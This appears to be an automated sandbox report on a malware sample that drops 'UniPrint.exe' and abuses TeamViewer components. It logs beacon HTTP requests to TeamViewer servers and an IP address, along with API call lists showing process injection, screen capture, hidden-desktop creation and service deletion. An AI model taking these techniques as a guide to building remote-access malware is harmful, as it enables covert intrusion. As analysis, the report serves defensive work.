Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70986B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: wogZe27GBB.exe, 00000000.00000002.248869618.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098A020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCE8 appears 61 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098A880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709826E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B1A0 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709827F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098A880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B1A0 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709826E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709827F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: No import functions for PE file found
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: wogZe27GBB.exeReversingLabs: Detection: 71%
